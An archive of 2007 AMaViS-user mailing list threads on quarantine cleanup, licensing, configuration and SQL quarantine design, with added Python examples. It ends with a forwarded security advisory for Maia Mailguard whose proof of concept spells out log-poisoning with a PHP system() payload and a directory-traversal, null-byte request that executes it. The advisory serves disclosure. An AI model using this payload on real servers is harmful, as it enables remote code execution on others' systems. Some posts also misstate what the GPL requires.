[AMaViS-user] clearing quarantined messages
Hello, I'm a newbie on amavis. I run amavis to block virus email. It seems to work fine: no viruses came through so far, and no email got lost (I think). The problem is that my quarantine directory is filling up, and I don't know how to clean it. When I cleared /var/lib/amavis/tmp/, amavis stopped working.

How do I safely remove old quarantine files (e.g. 30 days)? I run amavisd-new 2.4.2-6.1 on Debian Etch.

Thanks

-
This SF.net email is sponsored by DB2 Express
Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now.
http://sourceforge.net/powerbar/db2/
___
AMaViS-user mailing list
AMaViS-user@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/amavis-user
AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3
AMaViS-HowTos:http://www.amavis.org/howto/
Re: [AMaViS-user] clearing quarantined messages
vwf wrote:
> Hello, I'm a newbie on amavis. I run amavis to block virus email. It seems to work fine: no viruses came through so far, and no email got lost (I think). The problem is that my quarantine directory is filling up, and I don't know how to clean it. When I cleared /var/lib/amavis/tmp/, amavis stopped working.
>
> How do I safely remove old quarantine files (e.g. 30 days)? I run amavisd-new 2.4.2-6.1 on Debian Etch.
>
> Thanks

It is safe to remove the old temporary and quarantine files - amavis will not be using them.

    find /var/lib/amavis/tmp/ -type f -mtime +30 -print | xargs /bin/rm -f

MrC
Re: [AMaViS-user] Announce: Amavis log reporter updated v1.48.8
> Hello Amavis users,
>
> I've made enough changes in the Amavis log reporting utility to probably warrant this more general list announcement. The updates since my May 6th announcement are:
>
> New Features:
>
> - Ability to limit each detailed section's level 1 output (i.e. Top N). Variables that control depth levels in detailed reports may now be specified as m.n, where m is the maximum level to output, and n specifies the number of level 1 items output. For example, the setting:
>
>     $amavis_SpamBlocked = 2.10
>
>   will output the top 10 level 1 items, with each of those items providing 2 sub-levels of detail.
> - Show SA test scores in spam/ham reports
> - Add additional ccats MTA-BLOCKED, OVERSIZED, OTHER
> - Added content-type section (log_level = 2)
> - Added SpamAssassin bypassed count summary ($sa_mail_body_size_limit)
> - Rework white/blacklisted section; sender is now tracked.

Thanks Mike, I'll try it next week :)

Regards,
Leon
[AMaViS-user] Amavisd License Clarification
I was looking at the recent amavisd-new presentation by the author and slide four says that amavisd-new is GPL.

If it is GPL that would bring many many installations out of license compliance, especially in commercial products and email filtering services, that have heavily customized amavisd-new without submitting their changes to the community.

I thought that it had a BSD license which allows unlimited changes without change submissions, rather than GPL which requires that changes be submitted back to the community and forbids use in commercial products that don't supply all source code.

Mike Katz
http://messagepartners.com
Re: [AMaViS-user] Amavisd License Clarification
On 7/5/07, Michael Katz [EMAIL PROTECTED] wrote:
> I was looking at the recent amavisd-new presentation by the author and slide four says that amavisd-new is GPL.
>
> If it is GPL that would bring many many installations out of license compliance, especially in commercial products and email filtering services, that have heavily customized amavisd-new without submitting their changes to the community.
>
> I thought that it had a BSD license which allows unlimited changes without change submissions, rather than GPL which requires that changes be submitted back to the community and forbids use in commercial products that don't supply all source code.

I don't have anything older than 2.2.1 to hand, but it certainly uses the GPL as far back as that - as clearly detailed in the file titled LICENSE :)

--
Please keep list traffic on the list.

Rob MacGregor
Whoever fights monsters should see to it that in the process he doesn't become a monster. Friedrich Nietzsche
Re: [AMaViS-user] Amavisd License Clarification
Rob MacGregor wrote:
> On 7/5/07, Michael Katz [EMAIL PROTECTED] wrote:
>> I was looking at the recent amavisd-new presentation by the author and slide four says that amavisd-new is GPL.
>>
>> If it is GPL that would bring many many installations out of license compliance, especially in commercial products and email filtering services, that have heavily customized amavisd-new without submitting their changes to the community.
>>
>> I thought that it had a BSD license which allows unlimited changes without change submissions, rather than GPL which requires that changes be submitted back to the community and forbids use in commercial products that don't supply all source code.
>
> I don't have anything older than 2.2.1 to hand, but it certainly uses the GPL as far back as that - as clearly detailed in the file titled LICENSE :)

I guess it doesn't matter because who would enforce the license anyway?
[AMaViS-user] old-style sendmail LDA method hangs
Hello, I'm trying to migrate from a prehistoric non-daemon amavis to current amavisd-new. I have problems trying to use it with the sendmail LDA helper utility shipped with amavisd. I have the following mailer definition:

    Mlocal, P=/usr/sbin/amavis, F=lsDFMAw5:/|@qSPhn9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, T=DNS/RFC822/X-Unix, U=root:amavisd, A=amavis $f $u -- /usr/bin/procmail -t -Y -a $h -d $u

Everything starts OK, but it hangs until timeout or until the helper program (amavis) is manually killed.

---
Net::Server: 2007/07/05-12:56:00 CONNECT UNIX Socket: /var/amavisd/amavisd.sock
loaded base policy bank
loaded policy bank AM.PDP-SOCK
process_request: fileno sock=11, STDIN=0, STDOUT=1
switch_to_my_time 480 s, new request
process_request: suggested_protocol=AM.PDP on UNIX
process_policy_request: 0, amavisd (ch1-P-idle), fileno=11
switch_to_client_time 480 s, start receiving AM.PDP data
---

and it stalls here. After killing the helper program:

---
switch_to_my_time 480 s, received AM.PDP line
(!)policy protocol: INVALID AM.PDP ATTRIBUTE LINE: /var/amavisd/amavis-client-XXQ1CLnF
switch_to_client_time 480 s, receiving AM.PDP data
switch_to_my_time 480 s, end of AM.PDP session
exiting process_request
post_process_request_hook: timer was not running
idle_proc, bye: was busy, 52872.0 ms, total idle 0.000 s, busy 52.872 s
load: 100 %, total idle 0.000 s, busy 52.872 s
---

v5.8.0, amavisd 20070627.

The problem probably does not have anything to do with sendmail, since it fails even if I try to feed the helper program manually, i.e.:

    cat mail | amavis [EMAIL PROTECTED] wxmj040p -- /usr/bin/procmail -t -Y -a -d wxmj040p

Any idea what may be wrong?

--
Michał Jęczalik, +48.603.64.62.97
INFONAUTIC, +48.33.487.69.04
[AMaViS-user] Pre-Loading additional modules
In my amavisd.conf file I have:

    @additional_perl_modules = qw(/var/lib/spamassassin/compiled/3.002001/Mail/SpamAssassin/CompiledRegexps/body_0.pm /etc/mail/spamassassin/Botnet.pm /etc/mail/spamassassin/PDFinfo.pm);

But CompiledRegexps/body_0.pm doesn't seem to load:

    Jul 5 08:09:14 sa amavis[28179]: (28179-01) extra modules loaded: Mail/SpamAssassin/CompiledRegexps/body_0.pm
    Jul 5 08:09:20 sa amavis[27837]: (27837-04) extra modules loaded: unicore/lib/gc_sc/Digit.pl, unicore/lib/gc_sc/SpacePer.pl

Am I using the @additional_perl_modules statement properly?

Amavisd-new version 2.5.2 on Mandriva Corporate Server 4.0

--
Daniel J McDonald, CCIE # 2495, CISSP # 78281, CNX
Austin Energy
http://www.austinenergy.com
Re: [AMaViS-user] Always - BAD HEADER, Missing required header field: Date
Stefan.G wrote:
> On Wed, Jul 04, 2007 at 05:27:47PM +0200, mouss wrote:
>> Stefan.G wrote:
>>> Sometimes I get a BAD HEADER error that is not the Date one:
>>>
>>>     X-Amavis-Alert: BAD HEADER, Non-encoded 8-bit data (char E2 hex): X-eBay-due:\n\t\\342\\25431,76\\n
>>
>> Some webmail and bulkware clients are broken and send 8bit headers without encoding them. There's nothing you can do about it, except disabling the check or living with it. As long as you don't block/quarantine because of bad headers, you can live with the warnings.
>
> Ok. Can I get problems with spamassassin when I disable the bad header check / quarantine mode?

no. I have the bad headers check enabled, but no quarantine mode (I don't quarantine anything but viruses. spam gets delivered to special folders. bad headers do not change the disposition, because I see many of them in ham).
Re: [AMaViS-user] clearing quarantined messages
MrC wrote:
> vwf wrote:
>> Hello, I'm a newbie on amavis. I run amavis to block virus email. It seems to work fine: no viruses came through so far, and no email got lost (I think). The problem is that my quarantine directory is filling up, and I don't know how to clean it. When I cleared /var/lib/amavis/tmp/, amavis stopped working.
>>
>> How do I safely remove old quarantine files (e.g. 30 days)? I run amavisd-new 2.4.2-6.1 on Debian Etch.
>>
>> Thanks
>
> It is safe to remove the old temporary and quarantine files - amavis will not be using them.
>
>     find /var/lib/amavis/tmp/ -type f -mtime +30 -print | xargs /bin/rm -f
>
> MrC

On Debian you can remove temporary amavis-* directories simply by restarting amavis with '/etc/init.d/amavis restart'. The init script has code to remove temp directories (this is performed after amavisd-new is stopped):

    cleanup() {
        # Remove per-process working directories left under the amavis home and tmp dirs.
        # Errors (e.g. a directory that no longer exists) are silenced and ignored.
        [ -d /var/lib/amavis ] && find /var/lib/amavis -maxdepth 1 -name 'amavis-*' -type d \
            -exec rm -rf {} \; >/dev/null 2>&1 || true
        [ -d /var/lib/amavis/tmp ] && find /var/lib/amavis/tmp -maxdepth 1 -name 'amavis-*' -type d \
            -exec rm -rf {} \; >/dev/null 2>&1 || true
        :
    }

You should only have one amavis-* temp directory for each running amavisd-new process. If there are many more than this, you likely have some sort of problem. See http://www.ijs.si/software/amavisd/#faq-gen

As MrC shows, you can use the find command to delete files older than a given number of days. The command I use is similar:

    find /var/lib/amavis/virusmails -name 'virus-*' -mtime +29 -type f -exec rm -f {} \;

Gary V
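A scripted form of the age-based cleanup that MrC and Gary describe, added here as an example; it is not code from either post, from the Debian init script or from the amavisd-new project. It reproduces the `find DIR -name 'virus-*' -type f -mtime +N` selection (regular files only, directories and symlinks skipped), adds a dry-run mode so the selection can be reviewed before anything is deleted, and returns what it acted on. The directory layout, file names and ages are constructed inside the block; the quarantine path and the 30-day threshold are assumptions taken from the thread.

```python
"""Age-based cleanup of an amavisd-new file quarantine (added example)."""
import os
import tempfile
import time
from pathlib import Path

DAY = 86_400


def expired_quarantine_files(quarantine_dir, max_age_days, pattern="virus-*", now=None):
    """Return regular files matching `pattern` directly in quarantine_dir whose
    mtime is more than max_age_days old (the `find ... -type f -mtime +N` set)."""
    now = time.time() if now is None else now
    cutoff = now - max_age_days * DAY
    expired = []
    for p in sorted(Path(quarantine_dir).glob(pattern)):
        if p.is_symlink() or not p.is_file():   # never follow links, skip directories
            continue
        if p.stat().st_mtime < cutoff:
            expired.append(p)
    return expired


def purge_quarantine(quarantine_dir, max_age_days, dry_run=True, now=None):
    """Delete (or with dry_run=True only list) expired quarantine files.
    Returns the list of paths removed or that would have been removed."""
    victims = expired_quarantine_files(quarantine_dir, max_age_days, now=now)
    for p in victims:
        if dry_run:
            print("would remove", p)
        else:
            p.unlink()
    return victims


def build_demo_tree(base, now):
    """Construct a throwaway quarantine directory for the demonstration."""
    q = Path(base) / "virusmails"              # assumed layout, mirrors Gary's path
    q.mkdir(parents=True)
    for name, age_days in (("virus-old-a", 45), ("virus-old-b", 31), ("virus-new", 3)):
        f = q / name
        f.write_text("constructed quarantined message\n")
        os.utime(f, (now - age_days * DAY, now - age_days * DAY))
    # A file that does not match the pattern and a matching subdirectory must survive.
    keep = q / "spam-keep"
    keep.write_text("constructed spam quarantine file\n")
    os.utime(keep, (now - 90 * DAY, now - 90 * DAY))
    (q / "virus-subdir").mkdir()
    return q


def demo(max_age_days=30):
    """Run dry-run, then real purge, on the constructed tree; return what happened."""
    now = time.time()
    with tempfile.TemporaryDirectory() as base:
        q = build_demo_tree(base, now)
        planned = [p.name for p in purge_quarantine(q, max_age_days, dry_run=True, now=now)]
        removed = [p.name for p in purge_quarantine(q, max_age_days, dry_run=False, now=now)]
        remaining = sorted(p.name for p in q.iterdir())
    return planned, removed, remaining


if __name__ == "__main__":
    print(demo())
```

Running the module prints the two-file deletion plan, the same list after the real purge, and the three entries left behind. Pointing `purge_quarantine` at the live quarantine with `dry_run=True` first is the check the shell one-liners in the thread do not give you.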
Re: [AMaViS-user] Pre-Loading additional modules
Daniel wrote:
> In my amavisd.conf file I have:
>
>     @additional_perl_modules = qw(/var/lib/spamassassin/compiled/3.002001/Mail/SpamAssassin/CompiledRegexps/body_0.pm /etc/mail/spamassassin/Botnet.pm /etc/mail/spamassassin/PDFinfo.pm);
>
> But CompiledRegexps/body_0.pm doesn't seem to load:
>
>     Jul 5 08:09:14 sa amavis[28179]: (28179-01) extra modules loaded: Mail/SpamAssassin/CompiledRegexps/body_0.pm
>     Jul 5 08:09:20 sa amavis[27837]: (27837-04) extra modules loaded: unicore/lib/gc_sc/Digit.pl, unicore/lib/gc_sc/SpacePer.pl
>
> Am I using the @additional_perl_modules statement properly?
>
> Amavisd-new version 2.5.2 on Mandriva Corporate Server 4.0

In RELEASE_NOTES for 2.5.2:

    - suggestion: when using SpamAssassin plugin Rule2XSBody (available in more recent versions of SA), adding an entry like:
        Mail::SpamAssassin::CompiledRegexps::body_0
      to the @additional_perl_modules list allows preloading of compiled rules.

Adding the following two lines to amavisd.conf adds the directory name containing modules with compiled rules to the Perl module search path and allows Perl to find the listed module(s):

    my($sa_instdir) = '/var/db/spamassassin/compiled/3.002001';
    unshift(@INC, $sa_instdir, $sa_instdir.'/auto');

Gary V
Re: [AMaViS-user] Amavisd License Clarification
On 05/07/07, Michael Katz [EMAIL PROTECTED] wrote:
> I was looking at the recent amavisd-new presentation by the author and slide four says that amavisd-new is GPL.
>
> If it is GPL that would bring many many installations out of license compliance, especially in commercial products and email filtering services, that have heavily customized amavisd-new without submitting their changes to the community.
>
> I thought that it had a BSD license which allows unlimited changes without change submissions, rather than GPL which requires that changes be submitted back to the community and forbids use in commercial products that don't supply all source code.
>
> Mike Katz
> http://messagepartners.com

Mike,

IANAL, but I don't think that's what the GPL means. I think it means that IF a company distributes a product containing modified GPL components, they are required to provide the source to those modified components upon request (and publicly state their willingness to do so), and only by not doing either would be violating the GPL.

It does not mean that you've got to submit all your modifications back to the community, because
(a) the poor community would be swamped with diffs by people who modify not for any other purpose but to get amavisd-new to fit a mold they can't otherwise change.
(b) this FAQ says so: http://www.gnu.org/licenses/gpl-faq.html#GPLRequireSourcePostedPublic

So, if I'm reading this right, only a company selling an email filtering appliance containing a modified copy of amavisd-new need worry.

regards,
Riaan
Re: [AMaViS-user] SQL quarantine: delete or modify?
Brian Wong wrote:
> If you just delete records from the 'quarantine' table there would be no problem. Because the reference is to the 'msgs' table, not the other way around.

if you then 'clean out logs' (ie, delete records from msgs table every 90 days) won't it be missing a key and mess up foreign key constraints?

_
This email has been scanned and certified safe by SpammerTrap(tm).
For Information please see http://www.spammertrap.com
_
Re: [AMaViS-user] SQL quarantine: delete or modify?
On 7/5/07, Michael Scheidell [EMAIL PROTECTED] wrote:
> In SQL based quarantine, if I run a script to delete quarantined email after (x) days, but want to keep the LOG entries, what is best to do?
>
> Just find quarantined chunks and set to ''? Or point id to a phony (blank) record? The former would keep lots of records that are duplicates (blank chunks) but the latter might mess up foreign keys.
>
> What are you doing?

If you just delete records from the 'quarantine' table there would be no problem. Because the reference is to the 'msgs' table, not the other way around.
[AMaViS-user] SQL quarantine: delete or modify?
In SQL based quarantine, if I run a script to delete quarantined email after (x) days, but want to keep the LOG entries, what is best to do?

Just find quarantined chunks and set to ''? Or point id to a phony (blank) record? The former would keep lots of records that are duplicates (blank chunks) but the latter might mess up foreign keys.

What are you doing?

--
Michael Scheidell, CTO
SECNAP Network Security Corporation
Re: [AMaViS-user] SQL quarantine: delete or modify?
Brian Wong wrote:
> On 7/5/07, Michael Scheidell [EMAIL PROTECTED] wrote:
>> Brian Wong wrote:
>>> If you just delete records from the 'quarantine' table there would be no problem. Because the reference is to the 'msgs' table, not the other way around.
>>
>> if you then 'clean out logs' (ie, delete records from msgs table every 90 days) won't it be missing a key and mess up foreign key constraints?

ok, thanks.

> I think you are misunderstanding how it works. The dependence is unidirectional. If you delete the record from a 'msgs' table, the corresponding record in the 'quarantine' table will be removed. If you delete just the record in the 'quarantine' table, that will be the only table affected.
>
> The process of deleting a record from the 'msgs' table will check for any references to it. It will delete those that are referenced to it, but the lack of the reference will not throw an error.
Re: [AMaViS-user] SQL quarantine: delete or modify?
On 7/5/07, Michael Scheidell [EMAIL PROTECTED] wrote:
> Brian Wong wrote:
>> If you just delete records from the 'quarantine' table there would be no problem. Because the reference is to the 'msgs' table, not the other way around.
>
> if you then 'clean out logs' (ie, delete records from msgs table every 90 days) won't it be missing a key and mess up foreign key constraints?

I think you are misunderstanding how it works. The dependence is unidirectional. If you delete the record from a 'msgs' table, the corresponding record in the 'quarantine' table will be removed. If you delete just the record in the 'quarantine' table, that will be the only table affected.

The process of deleting a record from the 'msgs' table will check for any references to it. It will delete those that are referenced to it, but the lack of the reference will not throw an error.
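The one-directional dependency Brian describes, shown as an added example (not code from the thread or from the amavisd-new project): a reduced version of the msgs and quarantine tables loaded into an in-memory SQLite database, with the quarantine-to-msgs foreign key declared ON DELETE CASCADE. The column set is simplified and the rows, timestamps and retention periods are constructed; the table and key column names follow amavisd-new's SQL quarantine schema, the rest is an assumption.

```python
"""Foreign-key behaviour between msgs and quarantine (added example)."""
import sqlite3

# Reduced schema: only the columns the retention logic needs (assumption).
SCHEMA = """
CREATE TABLE msgs (
    mail_id   TEXT    PRIMARY KEY,   -- message id, the log row that is kept
    time_num  INTEGER NOT NULL,      -- unix time the message was processed
    content   TEXT                   -- e.g. V for virus, S for spam
);
CREATE TABLE quarantine (
    mail_id   TEXT    NOT NULL,
    chunk_ind INTEGER NOT NULL,
    mail_text BLOB    NOT NULL,
    PRIMARY KEY (mail_id, chunk_ind),
    FOREIGN KEY (mail_id) REFERENCES msgs(mail_id) ON DELETE CASCADE
);
"""

NOW = 1_183_636_800   # constructed "now": 2007-07-05 12:00:00 UTC
DAY = 86_400


def open_db():
    con = sqlite3.connect(":memory:")
    con.execute("PRAGMA foreign_keys = ON")   # SQLite enforces FKs only when asked
    con.executescript(SCHEMA)
    return con


def load_constructed_data(con):
    """Three log rows of different ages; the oldest message has two chunks."""
    msgs = [("aaaaaaaaaaaa", NOW - 100 * DAY, "V"),
            ("bbbbbbbbbbbb", NOW - 10 * DAY, "S"),
            ("cccccccccccc", NOW - 1 * DAY, "V")]
    chunks = [("aaaaaaaaaaaa", 0, b"constructed chunk 0"),
              ("aaaaaaaaaaaa", 1, b"constructed chunk 1"),
              ("bbbbbbbbbbbb", 0, b"constructed chunk 0"),
              ("cccccccccccc", 0, b"constructed chunk 0")]
    con.executemany("INSERT INTO msgs VALUES (?, ?, ?)", msgs)
    con.executemany("INSERT INTO quarantine VALUES (?, ?, ?)", chunks)
    con.commit()


def expire_quarantine(con, max_age_days):
    """Drop quarantined mail text older than max_age_days; msgs rows stay.
    Returns the number of chunks deleted."""
    cur = con.execute(
        "DELETE FROM quarantine WHERE mail_id IN "
        "(SELECT mail_id FROM msgs WHERE time_num < ?)",
        (NOW - max_age_days * DAY,))
    con.commit()
    return cur.rowcount


def expire_logs(con, max_age_days):
    """Drop msgs rows older than max_age_days; any remaining chunks go with
    them through the cascade. Returns the number of msgs rows deleted."""
    cur = con.execute("DELETE FROM msgs WHERE time_num < ?",
                      (NOW - max_age_days * DAY,))
    con.commit()
    return cur.rowcount


def orphan_chunk_rejected(con):
    """A chunk whose mail_id has no msgs row violates the key in the other
    direction, which is the case the thread asks about."""
    try:
        con.execute("INSERT INTO quarantine VALUES (?, ?, ?)",
                    ("zzzzzzzzzzzz", 0, b"orphan"))
    except sqlite3.IntegrityError:
        con.rollback()
        return True
    con.rollback()
    return False


def row_counts(con):
    m = con.execute("SELECT COUNT(*) FROM msgs").fetchone()[0]
    q = con.execute("SELECT COUNT(*) FROM quarantine").fetchone()[0]
    return m, q


if __name__ == "__main__":
    db = open_db()
    load_constructed_data(db)
    print("start", row_counts(db))
    print("chunks removed after 30 days:", expire_quarantine(db, 30), row_counts(db))
    print("msgs removed after 5 days:", expire_logs(db, 5), row_counts(db))
    print("orphan chunk rejected:", orphan_chunk_rejected(db))
```

Deleting from quarantine first leaves the msgs log rows intact, which answers Michael's original question without blanking chunks or pointing ids at a dummy record; deleting from msgs later removes whatever chunks are still attached, so a log-retention job that runs after the quarantine-retention job never trips a constraint.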
[AMaViS-user] FW: [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary Code Execution][NETRAGARD-20070628]
didn't see this anywhere, thought you might want to know:

--
Michael Scheidell, CTO
SECNAP Network Security Corporation
Keep up to date with latest information on IT security:
Real time security alerts: http://www.secnap.com/news

-----Original Message-----
From: Netragard Security Advisories [mailto:[EMAIL PROTECTED]
Sent: Thursday, July 05, 2007 11:19 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary Code Execution][NETRAGARD-20070628]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

*** NETRAGARD ADVISORY
http://www.netragard.com
We make IT Safe

[Advisory Summary]
---
Advisory Author : Adriel T. Desautels
Advisory ID : NETRAGARD-20070628
Product Name : Maia Mailguard
Product Version : <= 1.0.2 FreeBSD and Possibly More
Vendor Name : http://www.miamailguard.com
Type of Vulnerability : Directory Traversal / File Read
Effort (1-10 where 1 == easy) : 2
Impact : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released : N/A
Discovery Date : 06/10/2007

[POSTING NOTICE]
---
If you intend to post this advisory on your web-site you must provide a clickable link back to http://www.netragard.com as the contents of this advisory may be updated without notice.

[Product Description]
---
Maia Mailguard is a web-based interface and management system based on the popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl and PHP, Maia Mailguard gives end-users control over how their mail is processed by virus scanners and spam filters, while giving mail administrators the power to configure site-wide defaults and limits.
-- http://www.miamailguard.com --

[Technical Summary]
---
A Directory Traversal vulnerability exists in the Maia Mailguard Web Application that enables an attacker to execute arbitrary commands on the affected system.
[Technical Details]
---
Improper input validation on the lang variable in the Maia Mailguard web application has resulted in a Directory Traversal vulnerability that can be used to execute arbitrary commands on the affected system, or to read arbitrary files on the affected system.

[Proof Of Concept]
---
1-) An attacker can inject code into the httpd-error.log file by connecting to port 80 on the affected system and issuing a "get CODE HERE" command. See example below:

    the-wretched:~ simon$ telnet maiatest.snosoft.com 80
    Trying 10.0.0.128...
    Connected to maiatest.snosoft.com.
    Escape character is '^]'.
    get <pre><?php system('ls -laf /var/log');?>
    HTTP/1.1 400 Bad Request
    Date: Wed, 20 Jun 2007 21:31:58 GMT
    Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/2.8.28 OpenSSL/0.9.7e-p1
    Connection: close
    Content-Type: text/html; charset=iso-8859-1

2-) Once the attacker has injected his code into the log file, the code can be executed by forcing the web application to read the log file. When the log file is read, the code is executed. Below is an example of code execution:

    the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/login.php?lang=../../../../../../../../../../../../../var/log/httpd-error.log%00.txt

[Vendor Status]
---
Vendor has been notified and was quick to resolve the issue.

[Vendor Comments]
---
The only addition that I had was that it seems to only affect systems like freebsd... It would be nice to nail that down. I suspect the root security issue is really with the php and file-system interaction... my patch just simply works around and blocks the root problem. From my developer point of view, I'm asking for one file and the file-system is giving us something else. That's a serious risk. If we could at least express that concern, I think that would be prudent.

Chicken and egg problem, I was kinda waiting on you to post our own ticket, but I can add a comment afterwards. OK.
Here's our ticket which also references the changeset: http://www.maiamailguard.org/maia/ticket/479

A unified patch may be retrieved from: http://www.maiamailguard.org/
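The flaw class in the advisory above, illustrated as an added example that is not Maia Mailguard's code or its patch: a language-selection parameter used to build a file name, first in the naive concatenating form that lets `../` sequences leave the locale directory and a NUL byte cut off the fixed suffix in C-string based runtimes, then in a hardened form that rejects NUL bytes, requires a strict language token, checks an allowlist and still verifies that the canonical path stays under the base directory. The base directory, file suffix, allowlist and the traversal sample are assumptions constructed for the demonstration.

```python
"""Validating a file-selecting request parameter (added example)."""
import os
import re

LOCALE_DIR = "/srv/webapp/locale"                  # hypothetical base directory
ALLOWED_LANGS = frozenset({"en", "de", "fr"})      # hypothetical allowlist
_LANG_RE = re.compile(r"[a-z]{2}(?:_[A-Z]{2})?")   # e.g. "en" or "pt_BR"

# Constructed sample in the shape the advisory describes: walk up to the root,
# name a log file, and append a NUL so a C-string runtime drops the suffix.
TRAVERSAL_SAMPLE = "../../../../../../../../../../../../../var/log/httpd-error.log\x00"


def naive_locale_path(lang):
    """Vulnerable pattern: untrusted input concatenated straight into a path.
    Python itself refuses NUL bytes in file names, but the returned string
    shows what a C-string based file API would be handed."""
    return LOCALE_DIR + "/" + lang + ".txt"


def escapes_base(path, base=LOCALE_DIR):
    """True when the normalised path does not lie under base."""
    norm = os.path.normpath(path)
    return os.path.commonpath([norm, os.path.normpath(base)]) != os.path.normpath(base)


def safe_locale_path(lang):
    """Hardened version: returns the path to open, or None to reject the request."""
    if not isinstance(lang, str) or "\x00" in lang:
        return None                                   # embedded NUL: reject outright
    if _LANG_RE.fullmatch(lang) is None:
        return None                                   # not a plain language token
    if lang not in ALLOWED_LANGS:
        return None                                   # syntactically fine, but unknown
    path = os.path.normpath(os.path.join(LOCALE_DIR, lang + ".txt"))
    if escapes_base(path):
        return None                                   # defence in depth; cannot trigger
    return path                                       # with the allowlist, kept anyway


if __name__ == "__main__":
    print("naive  :", repr(naive_locale_path(TRAVERSAL_SAMPLE)),
          "escapes base:", escapes_base(naive_locale_path(TRAVERSAL_SAMPLE)))
    for candidate in ("en", "pt_BR", "..", TRAVERSAL_SAMPLE):
        print("safe   :", repr(candidate), "->", safe_locale_path(candidate))
```

The allowlist is the control that actually closes the hole; the regular expression and the `escapes_base` check are there so that the function stays safe if someone later replaces the fixed set with a directory listing or a database lookup. Logging rejected values (without writing the raw bytes into a log that the application itself can be made to read) is the detection side of the same fix.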